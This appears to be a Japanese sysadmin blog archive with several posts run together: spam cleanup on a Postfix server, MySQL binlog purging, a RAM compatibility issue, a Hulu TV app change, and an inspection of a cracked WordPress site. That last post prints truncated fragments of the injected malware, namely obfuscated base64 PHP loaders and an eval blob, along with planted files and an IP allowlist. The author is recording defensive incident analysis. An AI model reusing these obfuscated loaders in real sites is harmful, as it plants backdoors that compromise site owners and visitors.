SPAM対応メモ 2026/06/24

メールサーバに新しいメールが入ってこない、というので調査したら、特定ユーザのメールパスワードがばれていてSPAM送信に使われていたという時のメモ

(1) 落ちてるデーモンはいなかった

systemctl --failed

を実行した際に止まっているものはいなかった

(2) メールのキューに異常

postfixのメールキューの状態を確認

# postqueue -p

数万通のメールが滞留していた

差出人はほぼ1ユーザで、宛先は方々にわたる

(3) メール配送停止

ひとまず、postfixのメール配送処理を止める

# postfix abort

(4) ログ確認

/var/log/messagesと/var/log/maillog に対して そのユーザ名でgrepをかけて確認

roudcubeのログにて、roundcube内から多数のメールアドレスを指定してメール送信していることを確認

(5) アクセス者IPアドレス確認

ログから該当する操作のIPアドレスを確認し、そのアドレスがどこなのかを確認

今回は3IPアドレスからきており、どれも海外

(6) あからさまにSPAMを削除

今回特定の時間帯の送信は全部SPAMっぽかったので以下のコマンドで該当ユーザのメールをpostsuper -d queueIDで削除

# for queid in `postqueue -p|grep "Jun 24 04"  |grep ユーザ名|awk '{ print $1 }' | sed s/\*//ig`; do postsuper -d $queid; done

あと、MAILER-DAEMON関連の返送処理も削除

# for queid in `postqueue -p|grep MAILER|awk '{ print $1 }' | sed s/\*//ig`; do postsuper -d $queid; done

(7) とりあえず再開

wordpressサーバの/var/lib/mysqlにbinlogファイルが大量にたまっていた

知り合いのとこのwordpressサーバが稼働していなかったので調査したところディスクフルが発生していた

状況を確認すると、 /var/lib/mysqlが15GBと大変な状態になっていた

binlogがたまりまくっていた

というか、4/23以降、一日1GB以上出力されたりしてるのなんでだ??

[root@xxxxxxxxxxx mysql]# ls -ltr /var/lib/mysql/binlog*
-rw-r-----. 1 mysql mysql 1076027128 Apr 11 12:15 /var/lib/mysql/binlog.000401
-rw-r-----. 1 mysql mysql  895282121 Apr 23 06:48 /var/lib/mysql/binlog.000402
-rw-r-----. 1 mysql mysql 1076428654 Apr 23 19:12 /var/lib/mysql/binlog.000403
-rw-r-----. 1 mysql mysql  596357576 Apr 24 03:25 /var/lib/mysql/binlog.000404
-rw-r-----. 1 mysql mysql 1074553571 Apr 24 22:57 /var/lib/mysql/binlog.000405
-rw-r-----. 1 mysql mysql 1075609896 Apr 26 11:28 /var/lib/mysql/binlog.000406
-rw-r-----. 1 mysql mysql 1075981972 Apr 27 18:37 /var/lib/mysql/binlog.000407
-rw-r-----. 1 mysql mysql 1075913505 Apr 28 00:47 /var/lib/mysql/binlog.000408
-rw-r-----. 1 mysql mysql 1075838660 Apr 28 05:05 /var/lib/mysql/binlog.000409
-rw-r-----. 1 mysql mysql 1075205513 Apr 28 08:48 /var/lib/mysql/binlog.000410
-rw-r-----. 1 mysql mysql    5651277 Apr 29 23:47 /var/lib/mysql/binlog.000411
-rw-r-----. 1 mysql mysql    2052256 Apr 29 23:56 /var/lib/mysql/binlog.000412
-rw-r-----. 1 mysql mysql     101787 Apr 30 00:01 /var/lib/mysql/binlog.000413
-rw-r-----. 1 mysql mysql    3171581 Apr 30 03:19 /var/lib/mysql/binlog.000414
-rw-r-----. 1 mysql mysql 1074621728 May  3 02:47 /var/lib/mysql/binlog.000415
-rw-r-----. 1 mysql mysql 1074747087 May  5 18:27 /var/lib/mysql/binlog.000416
-rw-r-----. 1 mysql mysql 1074122275 May  6 01:02 /var/lib/mysql/binlog.000417
-rw-r-----. 1 mysql mysql 1076183303 May  6 16:09 /var/lib/mysql/binlog.000418
-rw-r-----. 1 mysql mysql 1074003040 May  7 01:08 /var/lib/mysql/binlog.000419
-rw-r-----. 1 mysql mysql        320 May  7 01:08 /var/lib/mysql/binlog.index
-rw-r-----. 1 mysql mysql  286409863 May  7 16:07 /var/lib/mysql/binlog.000420
[root@xxxxxxxxxxx mysql]# 

とりあえず、binlog関連の設定を「show variables like ‘binlog%’;」を実行して確認してみる

[root@xxxxxxxxxxx mysql]# mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 50827
Server version: 8.0.45 Source distribution

Copyright (c) 2000, 2026, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show variables like 'binlog%';
+------------------------------------------------+--------------+
| Variable_name                                  | Value        |
+------------------------------------------------+--------------+
| binlog_cache_size                              | 32768        |
| binlog_checksum                                | CRC32        |
| binlog_direct_non_transactional_updates        | OFF          |
| binlog_encryption                              | OFF          |
| binlog_error_action                            | ABORT_SERVER |
| binlog_expire_logs_auto_purge                  | ON           |
| binlog_expire_logs_seconds                     | 2592000      |
| binlog_format                                  | ROW          |
| binlog_group_commit_sync_delay                 | 0            |
| binlog_group_commit_sync_no_delay_count        | 0            |
| binlog_gtid_simple_recovery                    | ON           |
| binlog_max_flush_queue_time                    | 0            |
| binlog_order_commits                           | ON           |
| binlog_rotate_encryption_master_key_at_startup | OFF          |
| binlog_row_event_max_size                      | 8192         |
| binlog_row_image                               | FULL         |
| binlog_row_metadata                            | MINIMAL      |
| binlog_row_value_options                       |              |
| binlog_rows_query_log_events                   | OFF          |
| binlog_stmt_cache_size                         | 32768        |
| binlog_transaction_compression                 | OFF          |
| binlog_transaction_compression_level_zstd      | 3            |
| binlog_transaction_dependency_history_size     | 25000        |
| binlog_transaction_dependency_tracking         | COMMIT_ORDER |
+------------------------------------------------+--------------+
24 rows in set (0.00 sec)

mysql> 

17.1.6.4 バイナリロギングのオプションと変数を参照するとbinlog_expire_logs_secondsが関連する設定で、これが”binlog_expire_logs_seconds=2592000″ なので 720時間(30日)の保存となっている

「show binary logs;」を実行して、mysql内部で認識されているbinlog一覧を確認。まあ、/var/lib/mysql以下にあるファイルと一致してますね

mysql> show binary logs;
+---------------+------------+-----------+
| Log_name      | File_size  | Encrypted |
+---------------+------------+-----------+
| binlog.000401 | 1076027128 | No        |
| binlog.000402 |  895282121 | No        |
| binlog.000403 | 1076428654 | No        |
| binlog.000404 |  596357576 | No        |
| binlog.000405 | 1074553571 | No        |
| binlog.000406 | 1075609896 | No        |
| binlog.000407 | 1075981972 | No        |
| binlog.000408 | 1075913505 | No        |
| binlog.000409 | 1075838660 | No        |
| binlog.000410 | 1075205513 | No        |
| binlog.000411 |    5651277 | No        |
| binlog.000412 |    2052256 | No        |
| binlog.000413 |     101787 | No        |
| binlog.000414 |    3171581 | No        |
| binlog.000415 | 1074621728 | No        |
| binlog.000416 | 1074747087 | No        |
| binlog.000417 | 1074122275 | No        |
| binlog.000418 | 1076183303 | No        |
| binlog.000419 | 1074003040 | No        |
| binlog.000420 |  319677238 | No        |
+---------------+------------+-----------+
20 rows in set (0.02 sec)

mysql> 

まず最初として、「set PERSIST binlog_expire_logs_seconds=604800;」を実行してbinlog_expire_logs_secondsを7日間に短縮する

mysql> set PERSIST binlog_expire_logs_seconds=604800;
Query OK, 0 rows affected (0.00 sec)

mysql> show variables like 'binlog%';
+------------------------------------------------+--------------+
| Variable_name                                  | Value        |
+------------------------------------------------+--------------+
| binlog_cache_size                              | 32768        |
| binlog_checksum                                | CRC32        |
| binlog_direct_non_transactional_updates        | OFF          |
| binlog_encryption                              | OFF          |
| binlog_error_action                            | ABORT_SERVER |
| binlog_expire_logs_auto_purge                  | ON           |
| binlog_expire_logs_seconds                     | 604800       |
| binlog_format                                  | ROW          |
| binlog_group_commit_sync_delay                 | 0            |
| binlog_group_commit_sync_no_delay_count        | 0            |
| binlog_gtid_simple_recovery                    | ON           |
| binlog_max_flush_queue_time                    | 0            |
| binlog_order_commits                           | ON           |
| binlog_rotate_encryption_master_key_at_startup | OFF          |
| binlog_row_event_max_size                      | 8192         |
| binlog_row_image                               | FULL         |
| binlog_row_metadata                            | MINIMAL      |
| binlog_row_value_options                       |              |
| binlog_rows_query_log_events                   | OFF          |
| binlog_stmt_cache_size                         | 32768        |
| binlog_transaction_compression                 | OFF          |
| binlog_transaction_compression_level_zstd      | 3            |
| binlog_transaction_dependency_history_size     | 25000        |
| binlog_transaction_dependency_tracking         | COMMIT_ORDER |
+------------------------------------------------+--------------+
24 rows in set (0.00 sec)

mysql> 

ただ、設定を変更しただけでは反映されないようで、10分程度待機しただけでは show binary logs;の結果に変化はなかった

mysql> show binary logs;
+---------------+------------+-----------+
| Log_name      | File_size  | Encrypted |
+---------------+------------+-----------+
| binlog.000401 | 1076027128 | No        |
| binlog.000402 |  895282121 | No        |
| binlog.000403 | 1076428654 | No        |
| binlog.000404 |  596357576 | No        |
| binlog.000405 | 1074553571 | No        |
| binlog.000406 | 1075609896 | No        |
| binlog.000407 | 1075981972 | No        |
| binlog.000408 | 1075913505 | No        |
| binlog.000409 | 1075838660 | No        |
| binlog.000410 | 1075205513 | No        |
| binlog.000411 |    5651277 | No        |
| binlog.000412 |    2052256 | No        |
| binlog.000413 |     101787 | No        |
| binlog.000414 |    3171581 | No        |
| binlog.000415 | 1074621728 | No        |
| binlog.000416 | 1074747087 | No        |
| binlog.000417 | 1074122275 | No        |
| binlog.000418 | 1076183303 | No        |
| binlog.000419 | 1074003040 | No        |
| binlog.000420 |  358509579 | No        |
+---------------+------------+-----------+
20 rows in set (0.00 sec)

mysql> 

13.4.1.1 PURGE BINARY LOGS ステートメント にあるように手動で「PURGE BINARY LOGS BEFORE ‘2026-05-01 00:00:00’;」と実行すれば2026/05/01以前のbinlogが削除されるのだと思うんだけど・・・ということで実行

mysql> PURGE BINARY LOGS BEFORE '2026-05-01 00:00:00';
Query OK, 0 rows affected (0.02 sec)

mysql> show binary logs;
+---------------+------------+-----------+
| Log_name      | File_size  | Encrypted |
+---------------+------------+-----------+
| binlog.000415 | 1074621728 | No        |
| binlog.000416 | 1074747087 | No        |
| binlog.000417 | 1074122275 | No        |
| binlog.000418 | 1076183303 | No        |
| binlog.000419 | 1074003040 | No        |
| binlog.000420 |  377894939 | No        |
+---------------+------------+-----------+
6 rows in set (0.00 sec)

mysql> 

ファイルは・・・削除されていますね

[root@xxxxxxxxxxx mysql]# ls -ltr /var/lib/mysql/binlog*
-rw-r-----. 1 mysql mysql 1074621728 May  3 02:47 /var/lib/mysql/binlog.000415
-rw-r-----. 1 mysql mysql 1074747087 May  5 18:27 /var/lib/mysql/binlog.000416
-rw-r-----. 1 mysql mysql 1074122275 May  6 01:02 /var/lib/mysql/binlog.000417
-rw-r-----. 1 mysql mysql 1076183303 May  6 16:09 /var/lib/mysql/binlog.000418
-rw-r-----. 1 mysql mysql 1074003040 May  7 01:08 /var/lib/mysql/binlog.000419
-rw-r-----. 1 mysql mysql         96 May  7 16:25 /var/lib/mysql/binlog.index
-rw-r-----. 1 mysql mysql  383435241 May  7 16:25 /var/lib/mysql/binlog.000420
[root@xxxxxxxxxxx mysql]# 

とりあえずしのいだので、次はなぜ4/23以降でbinlogが肥大化したのか調査ですね・・・


2026/05/11追記

原因がはっきりしないのだが、wordpressのプラグインで更新されていなかったものがあったので、アップデートを5/8に実施したところ、ファイルの増加量が減っていた

[root@xxxxxxxxxxx ~]# ls -ltr /var/lib/mysql/bin*
-rw-r-----. 1 mysql mysql 1074747087 May  5 18:27 /var/lib/mysql/binlog.000416
-rw-r-----. 1 mysql mysql 1074122275 May  6 01:02 /var/lib/mysql/binlog.000417
-rw-r-----. 1 mysql mysql 1076183303 May  6 16:09 /var/lib/mysql/binlog.000418
-rw-r-----. 1 mysql mysql 1074003040 May  7 01:08 /var/lib/mysql/binlog.000419
-rw-r-----. 1 mysql mysql 1074323672 May  8 03:18 /var/lib/mysql/binlog.000420
-rw-r-----. 1 mysql mysql 1073965591 May  8 16:47 /var/lib/mysql/binlog.000421
-rw-r-----. 1 mysql mysql 1074897443 May 10 12:39 /var/lib/mysql/binlog.000422
-rw-r-----. 1 mysql mysql        128 May 10 12:39 /var/lib/mysql/binlog.index
-rw-r-----. 1 mysql mysql  576882057 May 11 14:17 /var/lib/mysql/binlog.000423
[root@xxxxxxxxxxx ~]#

さらに翌日確認して、間違いなく増加率が激減していることを確認した

[root@xxxxxxxxxxx ~]# ls -ltr /var/lib/mysql/bin*
-rw-r-----. 1 mysql mysql 1074747087 May  5 18:27 /var/lib/mysql/binlog.000416
-rw-r-----. 1 mysql mysql 1074122275 May  6 01:02 /var/lib/mysql/binlog.000417
-rw-r-----. 1 mysql mysql 1076183303 May  6 16:09 /var/lib/mysql/binlog.000418
-rw-r-----. 1 mysql mysql 1074003040 May  7 01:08 /var/lib/mysql/binlog.000419
-rw-r-----. 1 mysql mysql 1074323672 May  8 03:18 /var/lib/mysql/binlog.000420
-rw-r-----. 1 mysql mysql 1073965591 May  8 16:47 /var/lib/mysql/binlog.000421
-rw-r-----. 1 mysql mysql 1074897443 May 10 12:39 /var/lib/mysql/binlog.000422
-rw-r-----. 1 mysql mysql        128 May 10 12:39 /var/lib/mysql/binlog.index
-rw-r-----. 1 mysql mysql  867993952 May 12 11:46 /var/lib/mysql/binlog.000423
[root@xxxxxxxxxxx ~]# 

2026/05/21追記

落ち着いたかと思ったら、またかーーー

-rw-r-----. 1 mysql mysql         56 Nov 16  2021  auto.cnf
-rw-r-----. 1 mysql mysql  880718553 May 14 03:39  binlog.000424
-rw-r-----. 1 mysql mysql 1074983980 May 15 22:05  binlog.000425
-rw-r-----. 1 mysql mysql 1074458947 May 16 01:00  binlog.000426
-rw-r-----. 1 mysql mysql 1076353655 May 16 04:11  binlog.000427
-rw-r-----. 1 mysql mysql 1075894927 May 16 11:45  binlog.000428
-rw-r-----. 1 mysql mysql 1076430757 May 16 20:30  binlog.000429
-rw-r-----. 1 mysql mysql 1074418130 May 17 01:11  binlog.000430
-rw-r-----. 1 mysql mysql 1075734983 May 17 17:52  binlog.000431
-rw-r-----. 1 mysql mysql 1074210923 May 18 13:17  binlog.000432
-rw-r-----. 1 mysql mysql 1074818836 May 18 19:42  binlog.000433
-rw-r-----. 1 mysql mysql 1075645558 May 19 00:18  binlog.000434
-rw-r-----. 1 mysql mysql 1074848030 May 19 10:46  binlog.000435
-rw-r-----. 1 mysql mysql 1075579091 May 19 15:20  binlog.000436
-rw-r-----. 1 mysql mysql 1076234338 May 19 20:25  binlog.000437
-rw-r-----. 1 mysql mysql  618166201 May 20 03:45  binlog.000438
-rw-r-----. 1 mysql mysql 1075233776 May 20 15:03  binlog.000439
-rw-r-----. 1 mysql mysql 1076237754 May 20 18:18  binlog.000440
-rw-r-----. 1 mysql mysql 1074276162 May 20 21:19  binlog.000441
-rw-r-----. 1 mysql mysql  227580182 May 21 11:19  binlog.000442
-rw-r-----. 1 mysql mysql        304 May 20 21:19  binlog.index

もう set PERSIST binlog_expire_logs_seconds=1; を設定してしまおう・・・・(0が無限扱いだといやなので数値入れとくか的な)

mysql> set PERSIST binlog_expire_logs_seconds=1;
Query OK, 0 rows affected (0.00 sec)

mysql> show variables like 'binlog%';
+------------------------------------------------+--------------+
| Variable_name                                  | Value        |
+------------------------------------------------+--------------+
| binlog_cache_size                              | 32768        |
| binlog_checksum                                | CRC32        |
| binlog_direct_non_transactional_updates        | OFF          |
| binlog_encryption                              | OFF          |
| binlog_error_action                            | ABORT_SERVER |
| binlog_expire_logs_auto_purge                  | ON           |
| binlog_expire_logs_seconds                     | 1            |
| binlog_format                                  | ROW          |
| binlog_group_commit_sync_delay                 | 0            |
| binlog_group_commit_sync_no_delay_count        | 0            |
| binlog_gtid_simple_recovery                    | ON           |
| binlog_max_flush_queue_time                    | 0            |
| binlog_order_commits                           | ON           |
| binlog_rotate_encryption_master_key_at_startup | OFF          |
| binlog_row_event_max_size                      | 8192         |
| binlog_row_image                               | FULL         |
| binlog_row_metadata                            | MINIMAL      |
| binlog_row_value_options                       |              |
| binlog_rows_query_log_events                   | OFF          |
| binlog_stmt_cache_size                         | 32768        |
| binlog_transaction_compression                 | OFF          |
| binlog_transaction_compression_level_zstd      | 3            |
| binlog_transaction_dependency_history_size     | 25000        |
| binlog_transaction_dependency_tracking         | COMMIT_ORDER |
+------------------------------------------------+--------------+
24 rows in set (0.00 sec)

mysql> perge binary logs before '2026-05-20 00:00:00';
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'perge binary logs before '2026-05-20 00:00:00'' at line 1
mysql> purge binary logs before '2026-05-20 00:00:00';
Query OK, 0 rows affected (0.12 sec)

mysql> show binary logs;
+---------------+------------+-----------+
| Log_name      | File_size  | Encrypted |
+---------------+------------+-----------+
| binlog.000438 |  618166201 | No        |
| binlog.000439 | 1075233776 | No        |
| binlog.000440 | 1076237754 | No        |
| binlog.000441 | 1074276162 | No        |
| binlog.000442 |  234276939 | No        |
+---------------+------------+-----------+
5 rows in set (0.00 sec)

mysql> purge binary logs before '2026-05-21 00:00:00';
Query OK, 0 rows affected, 1 warning (0.05 sec)

mysql> show binary logs;
+---------------+-----------+-----------+
| Log_name      | File_size | Encrypted |
+---------------+-----------+-----------+
| binlog.000442 | 234276939 | No        |
+---------------+-----------+-----------+
1 row in set (0.00 sec)

mysql> 

何も考えずにASUS PRIME B450M-Aで安いDDR4 DIMMを4枚指ししようとしたら認識しなかった件

そろそろ値上がるという評判なので、2月に導入したRyzen 3環境のメモリを増やそうとした。

クロックアップしないし、8GBだから大丈夫だろう、となんも考えずに安く売ってたKLEVV IM48GU88N26-GIIHA0(2枚で5333円)を購入。

いままで使っていたpanram W4U2666PS-8GC19と並べて見る。

基板は一緒。RAMチップが違うだけ、という感じ。

これはいけるな、と4枚指ししてみると、起動しない。

メモリ速度を2400MHz固定にしたり、いろんな組み合わせを試してみたりした結果、3枚までは起動した。4枚がどうしても起動できない。

(元々はA1とB1がPanramの2枚指しで、上記以外にもA1とB1:Panram/A2とB2:KLEVVとか全組み合わせをやってます)

ASUS PRIME B450M-A メモリ対応リスト」を確認してみて原因判明・・・

PANRAMの方は4DIMM対応になっているが、KLEVVの方は型番の下の方がちょっと違うので同じとは言いがたいが2DIMM対応までになっている。

というわけで、駄目そうなので、他に転用しました・・・

huluがhappyonになったせいでブラビアでHuluが見れない

Huluがhappyonになったせいで、アプリが変更になっています。

うちのSonyのブラビア(BRAVIA) W600BもHuluに対応しているのですが、5/17のアップデート以後、使えなくなりました。

ブラビアのサポートページをみると「Huluが起動できない(2017年5月17日Huluリニューアルと一部機種へのサービス終了に伴い発生する症状について)」という記事が出ています。

ブラビアの設定画面の「通信設定」にある「インターネットコンテンツの更新」を実行するといい、とありますが
更新後も、アプリ一覧にあるを選んでもアプリが開きません。

なんだろう?ともう一度読み直すと、別のアプリになっているので、アプリのアイコンが変わっているとのこと。
新しいアイコンはです。

こちらのアイコンを選ぶと無事Huluが起動しました。

クラックされたwordpressを見てみた

ページが開けない、というので、調べてみたら、クラックされたwordpressだったので、いろいろファイルをのぞいてみた記録

ざらっと調べてみたけど、被害範囲がでかすぎたので、最初から作ってもらうしかないです、という回答となりました。

・index.php に下記のような文字列が埋め込まれていた

$GLOBALS['_502176623_']=Array(base64_decode('ZXJyb3Jf' .'cm' .'V' .'wb3' .'J0aW5' .'n'),base64_decode('cHJlZ' .'19tYXRj' .'aA=' .'='),base64_decode('cHJlZ19' .'y' .'Z' .'XBsYW' .'Nl'),base64_decode('c3' .'RycG9' .'z'),base64_decode('' .'bWQ1'),base64_decode('ZnVuY' .'3Rp' .'b25fZXhpc3Rz'),base64_decode('Y3' .'Vy' .'bF9pbml' .'0'),base64_decode('Y' .'3Vyb' .'F9zZ' .'XRvcH' .'Q='),base64_decode('Y' .'3Vyb' .'F9zZXRv' .'cHQ='),base64_decode('Y' .'3V' .'yb' .'F9zZX' .'R' .'vcHQ'
<略>
+50)){echo $_8;}}elseif(@$GLOBALS['_502176623_'][13](_1644837808(1091))== round(0+0.25+0.25+0.25+0.25)){echo@$GLOBALS['_502176623_'][14]($_6);}}
//###==###

・wp-config.php 下記のようなものが数箇所に埋め込まれていた

eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGF1YnRvcSA9IDE2MDU7IGZ1bmN0aW9uIHh1Y3dxbXIoJHRidmRoLCAka29pbW5nbHcpeyRuanpuZXhxcSA9ICcnOyB
<略>
neCc9PidDJywgJ3onPT4nMCcpOwpldmFsLypkeXNwZiovKHh1Y3dxbXIoJGp5Z3h0c2IsICRxemlmeGY
pKTsKfQ=="));

・wp-content/uploads/ にいろんなものがアップロードされている

[root@host wp-content]# ls -la uploads/
合計 56
drwxr-xr-x  5 apache apache  4096 12月  3 11:45 2016 .
drwxr-xr-x  7 apache apache  4096 11月  7 12:50 2016 ..
-rw-r--r--  1 apache apache     0  5月  2 09:41 2016 1.php
drwxr-xr-x  4 apache apache  4096 10月 10 22:31 2016 2015
drwxr-xr-x 12 apache apache  4096 10月  1 01:17 2016 2016
-rw-r--r--  1 apache apache 21377  5月  2 09:41 2016 dbc.php.suspected
-rw-r--r--  1 apache apache  1367 11月  7 12:50 2016 jpgjsk.php.suspected
-rw-r--r--  1 apache apache  4902  5月  2 09:41 2016 mates.php.suspected
drwxr-xr-x  2 apache apache  4096 12月 13 23:58 2016 ps_auto_sitemap
[root@host wp-content]#

・wp-admin/.bt と wp-admin/css/.bt というファイルが作成され、おそらくアクセス許可IPが記載されている
ファイル末尾に追記されるわけではなく、ソートされた順序で増えていっていた

0.5.2.2
0.83.4.1
100.2.201.8
100.35.50.239
100.43.80.14
<略>
99.98.120.94
99.98.2.226
#version:1

・いろんなphpの冒頭が下記のように書き換えられている

<?php





                                      $h00d = 846;$GLOBALS['a287']=Array();globa
l$a287;<略>
$a287['h6d2'][65]]);}exit();} ?><?php
/**

・あと、データベースにいろいろデータが突っ込まれていた